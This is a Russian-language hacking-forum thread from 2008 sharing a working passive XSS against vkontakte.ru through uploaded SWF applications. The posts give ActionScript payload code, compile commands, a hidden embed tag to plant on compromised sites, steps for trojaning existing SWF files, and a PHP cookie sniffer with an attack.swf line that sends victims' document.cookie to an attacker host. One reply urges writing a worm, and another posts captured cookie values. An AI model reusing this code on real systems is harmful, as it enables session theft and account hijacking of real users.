ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

vkontakte.ru passive xss (swf)
  #1  
Старый 25.03.2008, 10:13
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию vkontakte.ru passive xss (swf)

Качаем mtask
Создаём файлик hek.as с содержанием
PHP код:
class hek{
  function 
hek() {
  }

  static function 
main(mc) {
    
getURL("javascript:alert(document.cookie);");
  }

Далее компилим
Код:
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as
В настройках делаем доступным сервис "Приложения", обзываем его как-нить и заливаем наш скомпиленный hek.swf +)
Смотрим созданное "приложение" и выдираем ссылку на swf
PHP код:
...
<
script type="text/javascript">
//<![CDATA[
var so = new SWFObject('evil_swf_on_vk','player',"1","1",'9');
so.addParam("allowfullscreen","false");
so.addParam("allownetworking""all");
... 
вот собственно и всё) кодес можно любой

Применение:
1) Можно вставить в сорц похэканного сайта кодес
PHP код:
<u style="display:none">
<
embed src="evil_swf_on_vk" width="1" height="1" type="application/x-shockwave-flash"></embed>
</
u
и кинуть ссылку жертве)

2) Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools
Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump
Код:
swfdump.exe hek.swf
компилим с нужными параметрами злобнокодес (а именно меняем флаг -header)
Код:
mtasc.exe -swf hek.swf -main -header x:y:z hek.as
x и y - размеры, z - частота кадров в секунду
и вживляем
Код:
swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf
Демо с алертом

Ссылки по теме:
http://tech.motion-twin.com/zip/mtasc-1.12.zip
http://www.swftools.org/swftools-0.7.0.exe
__________________

Последний раз редактировалось +toxa+; 25.03.2008 в 10:35..
 
Ответить с цитированием

  #2  
Старый 25.03.2008, 10:27
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Фига Тох
+5
 
Ответить с цитированием

  #3  
Старый 25.03.2008, 10:43
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию

Авторегер есть, спамилка по id есть, теперь и ксс есть. Хуярьте товарищи червя...
 
Ответить с цитированием

  #4  
Старый 25.03.2008, 13:44
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

Или я непохеккер или оно не работает. Алерты все на ура, но при добавлении конструкций типа:
Код:
javascript:eval(String.fromCharCode(bla-bla-bla))
выплёвывает содержимое bla-bla-bla, где bla-bla-bla - енто закодированная хрень:
Код:
img=new Image(); img.src="http://гаткей_снеффер.gif?"+document.cookie;

Последний раз редактировалось b00zy_c0d3r; 25.03.2008 в 13:53..
 
Ответить с цитированием

  #5  
Старый 25.03.2008, 14:00
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Ха....ништяк, молодец
 
Ответить с цитированием

  #6  
Старый 26.03.2008, 01:35
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

sniffer.php
PHP код:
<?
$ref 
$_SERVER['HTTP_REFERER'];
$infa $_SERVER['REMOTE_ADDR'];
$infa .= " : ";
$infa .= $_GET['s'];
$infa .= "\r\n\r\n";
$f=fopen("log.txt","a+");
fputs($f,$infa);
fclose($f);
Header("Location: http://www.vkontakte.ru"); //.$ref);
?>
attack.swf
PHP код:
getURL("javascript:location.href=\"http://yourhost/sniffer.php?s=\"+document.cookie;"); 
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

  #7  
Старый 27.03.2008, 01:22
Аватар для kot777
kot777
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277

Репутация: 1635


Отправить сообщение для kot777 с помощью ICQ
По умолчанию

Может я не фтыкнул чет, но...когда вручную заходишь на демку
то куки норм, а если через сайт подставной...т.е. кодом, то приходит
Код:
__utma=52566834.124252957.1203944691.1203944691.1206562305.2;%20__utmz=52566834.1203944691.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);%20__utmb=52566834;%20__utmc=52566834;%20jcpu=1;%20pcnt=4;%20pcls=1
__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?
 
Ответить с цитированием

  #8  
Старый 27.03.2008, 12:05
Аватар для Macro
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Все очень просто. Если вы делаете embed то получаете куки своего сайта. А если делать iframe то будут куки vkontakte
 
Ответить с цитированием

  #9  
Старый 27.03.2008, 14:12
Аватар для kot777
kot777
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277

Репутация: 1635


Отправить сообщение для kot777 с помощью ICQ
По умолчанию

Swf у меня не вызывается через ифрейм
__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?
 
Ответить с цитированием

  #10  
Старый 27.03.2008, 16:40
Аватар для Macro
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

гм у меня на опере вызывается
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ